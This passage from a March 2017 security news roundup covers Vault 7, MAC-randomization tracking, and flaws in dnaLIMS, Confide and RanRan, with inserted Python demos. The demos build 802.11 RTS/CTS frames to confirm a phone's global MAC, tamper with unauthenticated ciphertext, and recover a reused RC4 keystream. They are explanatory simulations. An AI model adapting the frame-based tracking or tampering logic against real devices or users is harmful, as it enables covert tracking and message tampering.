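                log.append(f"key ok ({fw.keystroke(ev[1])}/s)")
        except PolicyViolation as e:
            log.append(f"BLOCKED: {e}")
            break
    return log


# Constructed sample devices; the IDs are made up for illustration.
FLASH_DRIVE = Descriptor(0x0781, 0x5567, [(CLASS_MASS_STORAGE, 0)])
KEYBOARD = Descriptor(0x046D, 0xC31C, [(CLASS_HID, HID_KEYBOARD)])
COMPOSITE_ATTACK = Descriptor(0x1234, 0x0001, [(CLASS_HID, HID_KEYBOARD), (CLASS_MASS_STORAGE, 0)])

if __name__ == "__main__":
    burst = [("plug", KEYBOARD)] + [("key", i * 0.02) for i in range(40)]
    for line in run_events(burst):
        print(line)
```

A real device in the middle cannot inspect keystroke content, only timing and descriptors, which is why the rate rule is the natural first "advanced rule" and why a composite descriptor is refused outright rather than partially allowed.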


Avast: The documents on WikiLeaks contain no security holes

10.3.2017 Novinky/Bezpečnost Zabezpečení
The documents published by the WikiLeaks site do not reveal any security holes in the Czech company Avast, and moreover they are two years old. Avast vice president Sinan Eren said so in response to the information that Avast figures in the WikiLeaks documents as one of the security software vendors targeted by the US Central Intelligence Agency (CIA).
The WikiLeaks portal published around 8,000 pages of documents about the CIA's offensive software arsenal, with which the largest American intelligence organisation can penetrate mobile phones, smart TVs and other electronic devices and use them to gather information.

"Avast is mentioned in the published documents, as are other global security firms. However, the published documents do not reveal any security holes in Avast. Moreover, these are publicly available documents and conference presentations that are two years old," Eren said.

The documents contain enough technical detail
According to Pavel Bašta, a security expert at the CZ.NIC association, there may be two reasons for the CIA's interest in Avast, one of the largest security software vendors in the world. "Avast supplies security solutions used by hundreds of millions of users worldwide, and from the CIA's point of view it could be interesting if it could fool these security solutions into not recognising malware created by the CIA while still informing users about other infections," he said.

"The second factor may be that, like any other widely deployed software, Avast's products could serve to spread malicious programs if the CIA managed to find a suitable exploitable flaw in these products," he added.

According to Reuters, the published documents contain enough technical detail for security experts and security software vendors to understand how extensive the security holes are. But they provide few details that could help with a quick fix.

Avast, founded in 1988, develops security software, and its antivirus programs protect over 400 million computers and mobile devices worldwide. Last year it bought the rival Czech firm AVG.


MAC Randomization Flaws Expose Phones to Tracking

10.3.2017 securityweek Mobil
Researchers have disclosed a new attack method that can be leveraged to track mobile devices that rely on Media Access Control (MAC) address randomization to protect users’ privacy.

A MAC address is a unique identifier assigned to a device’s network interfaces. Since the address is unique and hardcoded, it can be very useful for tracking a device and its owner. In order to protect users against MAC-based tracking attempts, mobile device vendors have implemented MAC address randomization, which involves broadcasting a random Wi-Fi MAC address.

Experts have been working on demonstrating that MAC address randomization can be defeated and now, building on previous research, a team from the U.S. Naval Academy has come up with a technique that can be used to track all smartphones that rely on this feature.

Google introduced MAC address randomization to Android in 2015 with the release of Android 6 Marshmallow. However, researchers discovered that many device manufacturers that use Android, including Samsung, have not enabled MAC address randomization.

Apple introduced the feature in mid-2014 with the release of iOS 8, but experts found that iOS 10 makes it easy to identify and track devices regardless of their use of MAC address randomization.

U.S. Naval Academy researchers identified serious flaws in a majority of the Android implementations of MAC randomization, allowing them to break the protection in the case of roughly 96 percent of tested phones.

Researchers also analyzed so-called Karma attacks, a known method that involves simulating an access point that a device prefers to connect to. They also devised a new method that relies on control frames to expose the global MAC address for all types of devices, regardless of the operating system, manufacturer or the way randomization is implemented.

The new attack involves Request-to-Send (RTS) and Clear-to-Send (CTS) frames, which are used to avoid collisions in the IEEE 802.11 specification (i.e. Wi-Fi). When a node wants to send data, an RTS frame is transmitted to inform other nodes on the channel that the channel should not be used in order to avoid collisions. The target node responds with a CTS frame if the request to transmit data is approved.

By sending an RTS frame to IEEE 802.11 client devices, an attacker obtains a CTS response from which they can derive the global MAC address. Once the global MAC has been obtained, the attacker can easily track that device in the future by sending it RTS frames containing the global MAC.

Researchers said this attack method worked on all the devices they tested, including iPhone 5s, iPhone 6s, iPad Air, Google Pixel, LG Nexus 5X, LG G4 and G5, Motorola Nexus 6, Moto Z Play and OnePlus 3.

Since a wide range of devices are vulnerable to this attack, experts believe RTS/CTS responses are a function of the underlying 802.11 chipset, not the operating system. This would mean that the derandomization issue cannot be patched by smartphone manufacturers with an OS update.
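The RTS/CTS exchange above is simple enough to show end to end. What follows is an added example written for this page, not the Naval Academy team's code: it builds and parses real 802.11 RTS and CTS control frames (frame control, duration, RA/TA, CRC-32 FCS) and simulates the observed chipset behaviour, a client that transmits under a random MAC but still answers an RTS addressed to its global MAC with a CTS. The tracker sends one RTS to a candidate global MAC and reads presence from the reply. The MAC addresses are constructed; obtaining the first candidate global MAC is not simulated, only the confirmation and tracking step the article describes.

```python
import struct
import zlib

# 802.11 frame control byte 0 = subtype<<4 | type<<2 | version; control type is 1.
FC_RTS = 0xB4  # subtype 0b1011 (RTS)
FC_CTS = 0xC4  # subtype 0b1100 (CTS)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def fcs(body: bytes) -> bytes:
    """802.11 FCS: CRC-32 over header+body, transmitted little-endian."""
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def build_rts(ra: str, ta: str, duration: int = 0) -> bytes:
    """RTS = FC(2) | Duration(2) | RA(6) | TA(6) | FCS(4), 20 bytes."""
    body = bytes([FC_RTS, 0x00]) + struct.pack("<H", duration) + mac_bytes(ra) + mac_bytes(ta)
    return body + fcs(body)


def build_cts(ra: str, duration: int = 0) -> bytes:
    """CTS = FC(2) | Duration(2) | RA(6) | FCS(4), 14 bytes; RA is the RTS sender's TA."""
    body = bytes([FC_CTS, 0x00]) + struct.pack("<H", duration) + mac_bytes(ra)
    return body + fcs(body)


def parse_control(frame: bytes) -> dict:
    body, tail = frame[:-4], frame[-4:]
    if fcs(body) != tail:
        raise ValueError("bad FCS")
    duration = struct.unpack("<H", body[2:4])[0]
    if body[0] == FC_RTS and len(frame) == 20:
        return {"type": "RTS", "ra": mac_str(body[4:10]), "ta": mac_str(body[10:16]), "duration": duration}
    if body[0] == FC_CTS and len(frame) == 14:
        return {"type": "CTS", "ra": mac_str(body[4:10]), "duration": duration}
    raise ValueError("not an RTS/CTS frame")


class SimulatedClient:
    """Models the behaviour the researchers observed: the client transmits under a
    random MAC, yet the chipset answers an RTS addressed to the global MAC with CTS."""

    def __init__(self, global_mac: str, random_mac: str):
        self.global_mac = global_mac.lower()
        self.random_mac = random_mac.lower()

    def handle(self, frame: bytes):
        f = parse_control(frame)
        if f["type"] == "RTS" and f["ra"] in (self.global_mac, self.random_mac):
            # Real hardware subtracts SIFS + CTS airtime from the duration; omitted here.
            return build_cts(f["ta"], f["duration"])
        return None


def is_present(candidate_global_mac: str, attacker_mac: str, clients) -> bool:
    """Tracker side: one RTS to the candidate global MAC; a CTS back confirms that
    device is on the channel regardless of the random MAC it is currently using."""
    rts = build_rts(candidate_global_mac, attacker_mac)
    for c in clients:
        reply = c.handle(rts)
        if reply is not None:
            cts = parse_control(reply)
            if cts["type"] == "CTS" and cts["ra"] == attacker_mac.lower():
                return True
    return False


if __name__ == "__main__":
    victim = SimulatedClient("a4:5e:60:11:22:33", "da:a1:19:e2:2b:7c")
    print(is_present("a4:5e:60:11:22:33", "02:00:00:00:00:01", [victim]))  # True
    print(is_present("a4:5e:60:11:22:34", "02:00:00:00:00:01", [victim]))  # False
```

Over the air the same frames would be injected from a monitor-mode interface; the reply is generated by the 802.11 chipset, which is why, as the article notes, an operating system update cannot change it.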

“There are multiple scenarios in which a motivated attacker could use this method to violate the privacy of an unsuspecting user. If the global MAC address for a user is ever known, it can then be added to a database for future tracking,” researchers said in their paper. “Conceivably, an adversary with a sufficiently large database and advanced transmission capabilities could render randomization protections moot.”

Furthermore, the experts believe randomization can be truly effective only if it’s universally adopted.

“We propose the following best practices for MAC address randomization. Firstly, mandate a universal randomization policy to be used across the spectra of 802.11 client devices. We have illustrated that when vendors implement unique MAC address randomization schemes it becomes easier to identify and track those devices. A universal policy must include at minimum, rules for randomized MAC address byte structure, 802.11 IE usage, and sequence number behavior,” they added.


Critical Vulnerabilities Found in Popular DNA Sequencing Software

10.3.2017 securityweek Vulnerebility
dnaLIMS DNA Sequencing Software Vulnerabilities

Multiple Vulnerabilities in dnaLIMS Disclosed After Vendor Failed to Engage with Security Researchers

Multiple vulnerabilities exist in dnaLIMS, a web-based laboratory information management system that provides scientists and researchers with tools for processing and managing DNA sequencing requests. dnaLIMS, developed and sold by dnaTools, is used by academia, business and government, and is found in many US universities. The vulnerabilities are described as critical.

They were discovered in Q4 2016 by boutique security firm Shorebreak Security, and were reported to the vendor on Nov. 6. Shorebreak had been commissioned by a hospital user of dnaLIMS to perform a blackbox penetration test of the product. Users of dnaLIMS should note that at the time of writing this, the vulnerabilities have not been patched and are publicly known. For now, users should restrict access to authorized hosts only and make sure that the product cannot be accessed from the public internet; although in university environments that will still leave potential access to many thousands of students and academic researchers.

Shorebreak attempted to follow 'responsible disclosure' guidelines and reported seven serious vulnerabilities privately to the vendor. After four months of trying to engage with the vendor, it publicly disclosed the vulnerabilities in an advisory published this week. "Researchers cannot keep quiet about vulnerabilities indefinitely," Shorebreak CEO Mark Wolfgang told SecurityWeek. "If we can find these problems, so can hackers -- and dnaLIMS users need to be aware of the issues."

The vulnerabilities include an improperly protected web shell, unauthenticated directory traversal, insecure password storage, session hijacking, multiple cross-site scripting, and improperly protected content.

"An unauthenticated attacker," warns the advisory, "has the ability to execute system commands in the context of the web server process, hijack active user sessions, retrieve system files (including the plaintext password file), and inject untrusted html or JavaScript into the dnaLIMS application. An attacker could use these vulnerabilities together in order to gain control of the application as well as the operating system hosting the dnaLIMS software. If this software is being hosted publicly or in a DMZ this could act as a pivot point to launch further attacks or move laterally into trusted network(s)."

Wolfgang described his frustrations in trying to engage with the vendor. When he asked dnaTools for a PGP key to deliver the details securely, he was told to print them out and send hard copy through the post. "I got the feeling," Wolfgang told SecurityWeek, "they thought or hoped we wouldn't bother." But he did. He did so on Nov. 16, 2016, using USPS Certified Mail. But it wasn't until Dec. 8 that dnaTools acknowledged receipt and suggested that users place the application behind a firewall.

When he asked the vendor if it had a plan to address the vulnerabilities, he received the reply, "Yes, we have a plan. Please gather a DNA sequence, PO Number, or Fund Number and go to your local grocery store and see what it will buy you." The vendor clearly believes that the vulnerabilities cannot lead to meaningful data loss.

SecurityWeek emailed dnaTools requesting its point of view, but received no reply.

Earlier this week, Zenofex of exploiteers disclosed a series of vulnerabilities in Western Digital's My Cloud range of storage devices. Zenofex went straight to full public disclosure because, he told SecurityWeek, he had no confidence "in regards to [the] manufacturer's ability to properly triage and fix vulnerabilities in their code."

With dnaTools, Shorebreak Security attempted to follow responsible disclosure guidelines -- indeed, it exceeded those guidelines by giving the vendor four months to fix the product. But in the end, the result was the same in both cases: full public disclosure with no immediate fix from the vendor.


CIA replies to WikiLeaks Vault7 Leak, it is operating to protect Americans
10.3.2017 securityaffairs  BigBrothers

WikiLeaks Vault7 – CIA pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities.
The U.S. Central Intelligence Agency (CIA) has issued an official statement in response to the Wikileaks Vault7 Data leak.

The US intelligence agency denies conducting a large-scale surveillance on its citizens.

According to unnamed U.S. officials quoted by the Reuters press agency, the most likely source of the data leak is a CIA contractor.

“Contractors likely breached security and handed over documents describing the Central Intelligence Agency’s use of hacking tools to anti-secrecy group WikiLeaks, U.S. intelligence and law enforcement officials told Reuters on Wednesday,” Reuters states.

“Two officials speaking on condition of anonymity said intelligence agencies have been aware since the end of last year of the breach, which led to WikiLeaks releasing thousands of pages of information on its website on Tuesday.”

If confirmed, this is a very disconcerting detail, because it is not clear whether the intelligence agency has reported the incident to the IT vendors whose products could be targeted by the CIA hacking tools.

The CIA and the FBI have launched an investigation into the WikiLeaks Vault7 data leak, even though the Central Intelligence Agency has not confirmed the authenticity of the huge trove of files.

The intelligence Agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities. Its mission is to protect the US from foreign governments and non-state actors such as terrorists.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” reads the statement issued by the CIA.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

The tools in the CIA arsenal appear to have been designed for targeted attacks rather than dragnet surveillance. The CIA pointed out that intelligence agencies and law enforcement bodies are not allowed to spy on individuals in the United States, and that all of its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

The US Government is worried about the impact of the Vault 7 data leak on the activities conducted by US intelligence agencies. The revelations put at serious risk the efficiency of its tools and techniques.

Which are the reactions of other governments to the Wikileaks dump?

China expressed concern at the revelations; the products of many Chinese companies may have been targeted by CIA hackers.

“China expressed concern on Thursday over revelations in a trove of data released by Wikileaks purporting to show that the CIA can hack all manner of devices, including those made by Chinese companies,” Reuters reported.

“Dozens of firms rushed to contain the damage from possible security weak points following the anti-secrecy organization’s revelations, although some said they needed more details of what the U.S. intelligence agency was up to.

Widely-used routers from Silicon Valley-based Cisco (CSCO.O) were listed as targets, as were those supplied by Chinese vendors Huawei [HWT.UL] and ZTE (000063.SZ) and Taiwan supplier Zyxel for their devices used in China and Pakistan.”

Germany’s foreign ministry issued a statement saying that it is in contact with the U.S. Government to receive more information on the case.

The chief federal prosecutor’s office confirmed it would review the Wikileaks data dump related to the claims that the CIA ran a hacking hub from the U.S. consulate in Frankfurt.

“We will initiate an investigation if we see evidence of concrete criminal acts or specific perpetrators,” a spokesman for the federal prosecutor’s office told Reuters.


How Dutch Police Decrypted BlackBerry PGP Messages For Criminal Investigation
10.3.2017 thehackernews Crime
The Dutch police have managed to decrypt a number of PGP-encrypted messages sent by criminals using their custom security-focused PGP BlackBerry phones and identified several criminals in an ongoing investigation.
PGP, or Pretty Good Privacy, is an open source end-to-end encryption standard that can be used to cryptographically sign and encrypt emails, files, documents, or entire disk partitions in order to protect them from being spied on.
You'll be surprised to know how the police actually decrypted those PGP messages.
In April last year, the Dutch Police arrested a 36-year-old man on suspicion of money laundering and involvement in selling customized BlackBerry Phones with the secure PGP-encrypted network to criminals that were involved in organized crimes.
At the time, the police also seized a server belonging to Ennetcom, the company owned by Danny Manupassa, which contained data from end-to-end encrypted communications belonging to a large number of criminal groups.
Later, in January this year, the Dutch investigators claimed they could decrypt emails stored on PGP-encrypted BlackBerry devices using commercially available tools, but that only applied to phones in possession of authorities.
However, the latest news concerns reading all of the encrypted messages that were on the seized server.
Dutch police said they have accessed the contents of 3.6 million messages stored on that server, and that they have even managed to decrypt a number of messages despite their supposedly being protected with end-to-end encryption, the Openbaar Ministerie (the Public Prosecution Service) announced in a press release on Thursday.
Decrypting messages gave authorities access to evidence for dozens of criminal investigations into assassinations, drug trafficking, money laundering, armed robbery, attempted murder and other organized crime, which can lead to significant, decisive breakthroughs in criminal matters.
But the question remains:
How did the Police Decrypt the PGP-encrypted Messages?
Ennetcom sold some 20,000 encrypted BlackBerry phones that came preloaded with a number of security features, including PGP email, which apparently means that the email content should be protected even if it's intercepted or if authorities search its server.
However, the Dutch authorities discovered that the Ennetcom PGP BlackBerry devices routed user communications through its own infrastructure, a Canadian court filing reads.
And here the blunder comes into play: the "keys" for the PGP encryption system were generated by the company's server, rather than by the device.
As a result, the Dutch authorities found that the keys needed to decrypt the PGP-encrypted messages on the Ennetcom PGP BlackBerry devices were also stored on Ennetcom's BlackBerry Enterprise Servers. Encryption whose private keys are generated and held by the service operator is only end-to-end in name: whoever controls (or seizes) the server controls the keys.
The authorities then discovered a total of 7TB of data on the central server of Ennetcom in Canada and found that it was possible to read encrypted messages on the server.
In response to the Openbaar Ministerie press release, Ennetcom announced on its website that "the public prosecution has done these seizures under false pretenses," based on suspicion of money laundering with the excuse as if all the phone customers are criminals.


Multiple Security Gaps Found in Confide Messaging App

10.3.2017 securityweek Vulnerebility
Multiple vulnerabilities recently found in the Confide messaging application could allow an attacker to leak session information, enumerate users, and even access details such as emails and phone numbers.

Confide is promoted as a “confidential messenger” that allows users to speak freely, without fearing eavesdropping, courtesy of “military grade end-to end-encryption.” However, security researchers with IOActive and Quarkslab have discovered that users’ conversations were actually exposed to man-in-the-middle (MiTM) attacks, and also uncovered various other vulnerabilities in the messenger.

In a recent report (PDF), IOActive notes that the application’s notification system did not require a valid SSL server certificate to communicate, thus leaking session information to MiTM attacks. Furthermore, the app allowed for unencrypted messages to be delivered, without alerting the user on the matter.

During their analysis, IOActive researchers also found that the software was uploading file attachments before the user sent the intended message, and that it allowed attackers to send malformed messages that could crash, slow, or otherwise disrupt the application.

Furthermore, the application didn’t use authenticated encryption, meaning that Confide itself was able to alter messages in transit, an issue discovered by Quarkslab’s Jean-Baptiste Bédrune, who published a comprehensive technical analysis detailing how Confide could perform man-in-the-middle attacks and read users’ messages.

According to Bédrune, the application didn’t use a cryptographic integrity mechanism and the cryptographic protocol did not involve authentication. When notified of a new message, the client would request a list of unread threads from the server, but had no means to verify the origin of the message and to check the sender's public key authenticity either.

“The most obvious problem is […] linked to the fact that the encrypted message origin and the authenticity of the public encryption key transmitted by the server can in no way be verified by the client,” the researcher notes. The Confide server could generate its own key pair and transmit the public part to a client, decrypt the messages sent by the client, and re-encrypt them with its own key for the actual recipient, Bédrune claims.
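The two design gaps Bédrune describes, ciphertext without an integrity check and a recipient public key taken on the server's word, are easy to demonstrate in isolation. The following is an added example written for this page, not Confide's or Quarkslab's code. The stream cipher is a toy (SHA-256 in counter mode) standing in for whatever cipher the app used; the malleability it shows holds for any stream or CTR-mode cipher without a MAC. The "public keys" in the directory are opaque byte strings, since only the fingerprint comparison matters here. All keys, nonces and messages are constructed.

```python
import hashlib
import hmac


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy stream cipher: SHA-256 in counter mode (illustration only, not for real use)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def encrypt_noauth(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR with the keystream; decryption is the same operation. No integrity check."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def tamper(ct: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """What a server in the middle can do without the key: knowing (or guessing) that
    plaintext `old` sits at `offset`, flip ciphertext bits so it decrypts to `new`."""
    assert len(old) == len(new)
    ct = bytearray(ct)
    for i, (o, n) in enumerate(zip(old, new)):
        ct[offset + i] ^= o ^ n
    return bytes(ct)


def encrypt_then_mac(enc_key: bytes, mac_key: bytes, nonce: bytes, data: bytes):
    """The fix: encrypt-then-MAC. The tag covers nonce and ciphertext, so any bit
    flip is detected before decryption."""
    ct = encrypt_noauth(enc_key, nonce, data)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct, tag


def decrypt_verify(enc_key: bytes, mac_key: bytes, nonce: bytes, ct: bytes, tag: bytes) -> bytes:
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("message modified in transit")
    return encrypt_noauth(enc_key, nonce, ct)


def fingerprint(pubkey: bytes) -> str:
    """Short, human-comparable digest of a public key (32 hex chars in groups of 4)."""
    h = hashlib.sha256(pubkey).hexdigest()[:32]
    return " ".join(h[i:i + 4] for i in range(0, 32, 4))


def fetch_recipient_key(directory: dict, recipient: str, verified_fingerprint: str = None) -> bytes:
    """Client-side key lookup. Without an out-of-band fingerprint the client accepts
    whatever the server hands it, which is exactly the substitution Bédrune describes."""
    pub = directory[recipient]
    if verified_fingerprint is not None and not hmac.compare_digest(fingerprint(pub), verified_fingerprint):
        raise ValueError("key from server does not match the fingerprint verified out of band")
    return pub


if __name__ == "__main__":
    key, nonce = b"k" * 32, b"n" * 12
    ct = encrypt_noauth(key, nonce, b"pay 10 EUR to bob")
    print(encrypt_noauth(key, nonce, tamper(ct, 4, b"10", b"99")))  # b'pay 99 EUR to bob'
```

The fingerprint step is the "independent fingerprint verification" Confide later said it would add: the server still distributes keys, but a client that compares the fingerprint against one obtained out of band (in person, over another channel) can no longer be silently given a key the server generated itself.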

Other major issues discovered (PDF) by IOActive were related to account management, as it provided an attacker with the possibility to enumerate all Confide user accounts. Furthermore, the app didn’t employ a mechanism to adequately prevent brute-force attacks on user account passwords and even short, easy-to-guess passwords were allowed.

The application's website was also found to be vulnerable. Specifically, researchers discovered an arbitrary URL redirection in it and say that this could facilitate social engineering attacks against users. Additionally, the website was observed reflecting incorrectly entered passwords back to the browser.

By exploiting the vulnerabilities, an attacker could impersonate another user by hijacking their account session or by guessing their password, learn the contact details of all or specific Confide users, become an intermediary in a conversation and decrypt messages, or alter the contents of a message or attachment in transit without first decrypting it, IOActive says.

An attacker could also leak a great deal of user information, such as: usernames; whether the user has clicked the provided verification link; userIDs; the users’ public keys; the users’ phone numbers; and the users’ email addresses.

The security company tested Confide messaging app versions 4.0.4 for Android and 1.4.2 for Windows and Mac OS X and says it was able to recover more than 7,000 records for users registered between February 22-24, 2017. IOActive estimates that “between 800,000 and one million user records were potentially contained in the database.”

“Building a secure instant messaging is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning. The confidentiality of the exchanged messages depends on the robustness of TLS. Confide can technically read all the messages that pass through its servers. End-to-end encryption, as it is implemented, solely relies on the server through which the messages pass,” Bédrune notes.

Confide was alerted on the discovered issues and has already updated its mobile and desktop applications to address some of them. The company also confirmed that it could theoretically perform MiTM attacks against its users, but also says that it plans on releasing another update to add support for independent fingerprint verification.


WikiLeaks to Share CIA Hacking Tools With Tech Firms

10.3.2017 securityweek BigBrothers
WikiLeaks has decided to share information on the alleged CIA hacking tools with the tech companies whose products are affected, but the White House has warned that there may be legal repercussions.

The Vault 7 files made public this week by WikiLeaks appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile and desktop devices, networking equipment, and Internet of Things (IoT) devices.

The products of several major companies are mentioned in the leaks and many of them have asked the whistleblower organization to share additional information to help them ensure that their customers are protected against possible cyberattacks.

While it has published numerous documents containing technical information, WikiLeaks initially said it would not release any actual tools or exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should [be] analyzed, disarmed and published.”

However, WikiLeaks founder Julian Assange said in a press conference on Thursday that the decision to not release the exploits limits the ability of vendors to issue security fixes. That is why WikiLeaks has decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”

It’s worth noting that WikiLeaks has launched a poll on Twitter, asking users if more details should be shared with tech companies, and 57 percent of respondents said “Yes, make people safe,” while 36 percent of respondents said “No, they’re the problem.”

While the decision to share technical details with technology companies may be good news, White House representatives have warned about the possible legal repercussions for these firms.

“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”

Based on the information made public by WikiLeaks, security firms and major tech companies such as Microsoft, Apple and Google have determined that many of the vulnerabilities leveraged by the alleged CIA tools don’t affect the latest versions of their products. In fact, some of the flaws were patched several years ago.

The CIA has refused to comment on the authenticity of the leaked documents, but pointed out that the agency is legally prohibited from spying on individuals in the United States.


Chrome 57 Patches 35 Vulnerabilities

10.3.2017 securityweek Vulnerebility
Google announced on Thursday that the stable channel of its Chrome web browser has been updated to version 57 on Windows, Mac and Linux.

The latest version brings several new features, including the availability of CSS Grid Layout, and various functionality improvements. Chrome 57 also patches 35 vulnerabilities, more than half of which were reported by external researchers who earned a total of $38,000 for their work.

The most serious of the flaws, based on the bounty amount, is a memory corruption bug (CVE-2017-5030) in the V8 JavaScript engine. Brendon Tiszka received $7,500 for this find.

Researcher Looben Yang earned $5,000 for a use-after-free vulnerability (CVE-2017-5031) in the Almost Native Graphics Layer Engine (ANGLE).

Other high severity vulnerabilities, which earned experts between $500 and $3,000, have been described as an out-of-bounds write in PDFium, an integer overflow in libxslt, three use-after-free weaknesses in PDFium, incorrect security UI in Omnibox, and multiple out-of-bounds writes in ChunkDemuxer.

The medium severity flaws patched in Chrome 57 have been described as an address spoofing issue in Omnibox, bypass of the content security policy in Blink, incorrect handling of cookies in Cast, a heap overflow in Skia, a couple of use-after-free bugs in GuestView, and information disclosures in V8, XSS Auditor and Blink.

The list of researchers credited for finding the security holes patched with the release of Chrome 57 includes Ashfaq Ansari of Project Srishti, Holger Fuhrmannek, Ke Liu of Tencent, Enzo Aguado, Yongke Wang of Tencent, Choongwoo Han, jinmo123, Jordi Chancel, Nicolai Grødum, Mike Ruddy, Kushal Arvind Shah of Fortinet, Dhaval Kapil and Masato Kinugawa. Some of the individuals who reported vulnerabilities wanted to remain anonymous.

Google has paid out more than $9 million since the launch of its bug bounty program in 2010, including more than $3 million last year. As vulnerabilities become more difficult to find, the tech giant has decided to offer more money for critical issues. Last week, the company informed researchers that the reward for remote code execution vulnerabilities has increased to $31,337.


Middle East Government organizations hit with RanRan Ransomware
10.3.2017 securityaffairs Virus

Palo Alto Networks discovered a new strain of ransomware, dubbed RanRan ransomware, that has been used in targeted attacks in the Middle East.
Malware researchers at Palo Alto Networks have spotted a new strain of ransomware, dubbed RanRan, that has been used in targeted attacks against government organizations in the Middle East.

“Recently, Unit 42 has observed attacks against multiple Middle Eastern government organizations using a previously unseen ransomware family. Based on embedded strings within the malware, we have named this malware ‘RanRan’. ” reads the analysis published by PaloAlto Networks.

Instead of asking for a ransom, the threat actors demand that victims make a political statement on their website in order to get their files decrypted.

RanRan is able to encrypt various types of files stored on the infected system, including documents, executables, logs, databases, archives, source code, images and video files. The ransomware appends the .zXz extension to encrypted files and adds an HTML file containing instructions on how to recover the files onto the target system.

Victims are told not to shut down their system or run any antivirus solution in order to avoid “accidental damage on files.”

The crooks behind the RanRan ransomware instruct victims to create a subdomain with a political name on their website.

Victims are also instructed to upload to the subdomain a file named “Ransomware.txt” containing the text message “Hacked!” and the email address of the attacker.

“The ransom note specifically attempts to extort a political statement by forcing the victims to create a public sub-domain with a name that would appear to advocate and incite violence against a Middle Eastern political leader.” continues the analysis.

“The malware itself is fairly rudimentary and makes a number of mistakes in how files are encrypted. This allowed Unit 42 to create a script that is able to decrypt some files that were encrypted by RanRan.”

According to PaloAlto Networks, the intent is to force victims to disclose the hack and publish a statement against the leader of their country.

RanRan ransomware

The security firm did not reveal the names of the targeted organizations, nor did it attribute the attacks to a specific threat actor.

“By performing these actions, the victim, a Middle Eastern government organization, has to generate a political statement against the leader of the country,” said Palo Alto Networks researchers. “It also forces the victim to publicly announce that they have been hacked by hosting the Ransomware.txt file.”

The analysis of the malware revealed that the threat is not sophisticated; the researchers also spotted mistakes in the implementation of the file encryption feature, which appears to be based on publicly available source code.

“RanRan makes a number of mistakes when encryption occurs,” continues the analysis published by PaloAlto Networks.

“For one, they use a symmetric cipher (RC4) with a re-used key. Additionally, some files are encrypted, but the originals are not deleted. This is due to a number of reasons, one of which being that encryption is attempted against system files and other files that are opened by running processes.”

The good news is that, due to the errors in the encryption process, victims of RanRan can decrypt some of their files under specific conditions.

“Because we are provided with a situation where we have an original file, a file that has been encrypted, and the RC4 key is re-used against other encrypted files, we have the ability to decrypt some of this data.” continues the analysis.

“This only works in certain instances where the following criteria is met:

An encrypted and unencrypted file must be present for a given file size group (0-5MB, 5-30MB, etc). Using these two files, we are able to acquire the RC4 stream cipher.
The remaining encrypted files must be of lesser size than the previously obtained stream cipher. If a file is of greater size, it is only able to be partially decrypted.”
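The two conditions quoted above follow directly from how a stream cipher fails under key reuse. The example below is added here and is not Unit 42's script or RanRan's code: it implements plain RC4, recovers the keystream from one surviving original/encrypted pair, and then applies it to other files encrypted under the same key, which works fully for a smaller file and only partially for a larger one. Every file, name and key in it is constructed.

```python
"""
Added example: why one RC4 key re-used across files breaks the scheme.
RC4 is a stream cipher, so C = P xor K. With one (P, C) pair the keystream K
is known for len(P) bytes, and any other file encrypted under the same key
is decryptable up to that length. All data below is constructed.
"""


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA), then `length` bytes of keystream (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt; the two are the same operation for a stream cipher."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def recover_keystream(plaintext: bytes, ciphertext: bytes) -> bytes:
    """Known-plaintext recovery: K = C xor P, valid for min(len(P), len(C)) bytes."""
    n = min(len(plaintext), len(ciphertext))
    return xor_bytes(ciphertext[:n], plaintext[:n])


def decrypt_with_keystream(keystream: bytes, ciphertext: bytes):
    """Return (recovered_prefix, complete). Bytes beyond the known keystream
    cannot be recovered; that is the partial-decryption case in the text."""
    n = min(len(keystream), len(ciphertext))
    return xor_bytes(ciphertext[:n], keystream[:n]), n == len(ciphertext)


# Constructed victim disk: every file was encrypted with ONE key, and, as the
# analysis describes, one original was left behind next to its encrypted copy.
REUSED_KEY = b"constructed-ransomware-key"
ORIGINALS = {
    "report.docx": bytes(range(60)),               # 60 bytes, original survived
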